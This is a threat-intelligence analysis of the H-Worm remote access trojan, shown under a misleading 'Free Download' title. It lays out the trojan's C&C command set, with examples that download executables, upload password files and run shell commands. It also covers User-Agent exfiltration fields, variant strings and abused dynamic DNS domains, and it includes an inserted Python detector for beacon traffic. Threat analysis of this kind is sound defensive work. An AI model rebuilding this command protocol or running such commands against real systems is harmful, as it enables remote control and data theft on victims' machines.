
H-Worm Lite Version Free Download

H-Worm is a VBS (Visual Basic Script) based RAT which we believe is derived from the njRAT source code. H-Worm gives cyber-criminals controls similar to those of njRAT. It also uses dynamic DNS for its C&C servers, but unlike njRAT it uses POST requests and the HTTP User-Agent field to exfiltrate sensitive information from the infected machine.

The C&C communication POST requests typically use the parameters 'cmd' and 'param', as seen in the table below:

H-Worm Bot Command Summary (bot command: description. Example. Connection URI)
  • execute: Executes VB code sent in the response. Example: execute<|>vbscript code. Connection URI: none.
  • update: Updates the bot code to the provided code (overwrites the existing file). Example: update<|>new vbscript bot code. Connection URI: none.
  • uninstall: Removes the bot from the victim machine. Example: uninstall. Connection URI: none.
  • send: Downloads content from a URL and dumps it in a directory. Example: send<|>http://www.example.com/malware.exe<|>c:\. Connection URI: none.
  • site-send: Downloads content from a URL and saves it with the specified name. Example: site-send<|>http://www.example.com/script.vbs<|>c:\script.vbs. Connection URI: none.
  • recv: Uploads a file to the C2 domain. Example: recv<|>C:\Users\User\Documents\passwords.txt. Connection URI: POST /is-recving.
  • enum-driver: Sends information on the victim's system drives. Example: enum-driver. Connection URI: POST /is-enum-driver.
  • enum-faf: Sends a directory listing for a given path. Example: enum-faf<|>C:\Users\User. Connection URI: POST /is-enum-path.
  • enum-process: Sends the process listing of the victim's system. Example: enum-process. Connection URI: POST /is-enum-process.
  • cmd-shell: Runs a command via '%comspec% /c' on the infected host. Example: cmd-shell<|>calc.exe. Connection URI: POST /is-cmd-shell.
  • delete: Deletes a specified file or folder from the victim's system. Example: delete<|>C:\Users\User\Documents. Connection URI: none.
  • exit-process: Kills the specified process ID via taskkill. Example: exit-process<|>123. Connection URI: none.
  • sleep: Sets the number of milliseconds to sleep between 'ready' beacons (default 5000). Example: sleep<|>10000. Connection URI: none.
The C&C callback from an infected system includes the following information in the User-Agent field:
  • Bot identifier (based on a configurable string in the builder and the volume serial number)
  • Computer name
  • Username
  • Operating system information
  • Bot version
  • Antivirus information (Default value 'nan-av')
  • USB spreading [true/false] with date obtained from bot's registry entry.
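As an added illustration for defenders, not part of the original post, the following detector applies the command table and User-Agent layout described above to captured HTTP requests. It assumes the User-Agent fields are joined with the same `<|>` separator the command examples use, and the sample requests it ships with are constructed, not real captures.

```python
from typing import Optional
from urllib.parse import parse_qs

SEP = "<|>"  # field separator used in the command examples on this page
# Command names taken from the bot command summary above.
BOT_COMMANDS = {"execute", "update", "uninstall", "send", "site-send", "recv", "enum-driver",
                "enum-faf", "enum-process", "cmd-shell", "delete", "exit-process", "sleep"}
# User-Agent field order as listed on this page; joining them with SEP is an assumption.
UA_FIELDS = ("bot_id", "computer", "user", "os", "version", "av", "usb")

def parse_request(raw: str) -> tuple[str, str, dict, str]:
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def detect_hworm(raw: str) -> Optional[dict]:
    """Return beacon details when a POST shows >= 2 H-Worm indicators, else None."""
    method, path, headers, body = parse_request(raw)
    indicators = []
    if path.startswith("/is-"):            # e.g. /is-enum-process, /is-recving
        indicators.append("beacon-uri")
    ua_parts = headers.get("user-agent", "").split(SEP)
    if len(ua_parts) == len(UA_FIELDS):    # victim details carried in the User-Agent
        indicators.append("ua-fields")
    cmd = parse_qs(body).get("cmd", [""])[0].split(SEP)[0]
    if cmd in BOT_COMMANDS:                # cmd=<command><|><param> in the body
        indicators.append("cmd-param")
    if method != "POST" or len(indicators) < 2:
        return None
    finding = {"uri": path, "indicators": indicators, "cmd": cmd or None}
    if "ua-fields" in indicators:
        finding.update(zip(UA_FIELDS, ua_parts))
    return finding

# Constructed sample traffic (not real captures): one beacon, one ordinary request.
SAMPLE_BEACON = (
    "POST /is-enum-process HTTP/1.1\r\nHost: c2.example.invalid\r\n"
    "User-Agent: ABC_1A2B3C4D<|>DESKTOP-01<|>alice<|>Microsoft Windows 7<|>2.0<|>nan-av<|>false\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\ncmd=enum-process"
)
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    print(detect_hworm(SAMPLE_BEACON))   # dict with uri, indicators, cmd and UA fields
    print(detect_hworm(SAMPLE_BENIGN))   # None
```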
Below are some screenshots of H-Worm's control panel accessible to the attacker, from two different variants:

[Screenshot: H-Worm plus version C&C control panel]
[Screenshot: H-Worm control center, similar to njRAT's Manager]
[Screenshot: H-Worm plus version builder panel]
[Screenshot: H-Worm extended/lite version C&C control panel]

We continue to see many new variants of H-Worm popping up in the wild. Below are the version strings from some of the active H-Worm variants we have been tracking in 2015:

  • 2.0
  • 3az version
  • hello
  • KKMM NICE PC
  • mod version
  • plus
  • POUSSIN
  • safa7_22
  • SKY ESP PC
  • spupdate
  • the KR.joker worm
  • underworld final
  • v1.8.3  By AB DELL
  • v1.8.7  By AB DELL
  • worm Of Dz-47
  • WORM OF DZ-47

Below is the geographic distribution of the active Command & Control servers we have observed thus far in 2015:

[Map: geographic distribution of active H-Worm C&C servers observed in 2015]

One of the most popular features of this RAT family is the usage of Dynamic DNS for its Command & Control server communication. We have seen multiple sub-domains from the following Dynamic DNS domains in 2015 being abused by the malware authors for C&C communication:

  • adultdns.net
  • cable-modem.org
  • dz47.cf
  • ddns.net
  • dnsd.info
  • dvr-ddns.com
  • dyndns.org
  • dynu.net
  • ftp21.net
  • mooo.com
  • myq-see.com
  • no-ip.biz
  • noip.me
  • no-ip.org
  • redirectme.net
  • sells-it.net
  • servecounterstrike.com
  • serveftp.com
  • servehttp.com
  • servequake.com
  • sytes.net
  • user32.com
  • zapto.org

Conclusion

njRAT and H-Worm variant infections continue to rise, and while this threat is reportedly more prevalent in the Middle East region, we continue to see infections in other parts of the world as well. Despite Microsoft's attempt to disrupt the C&C channel for this notorious RAT back in June 2014, we continue to see the malware authors using various dynamic DNS services for its C&C server communication. It remains one of the most popular and prevalent RATs in the wild today.
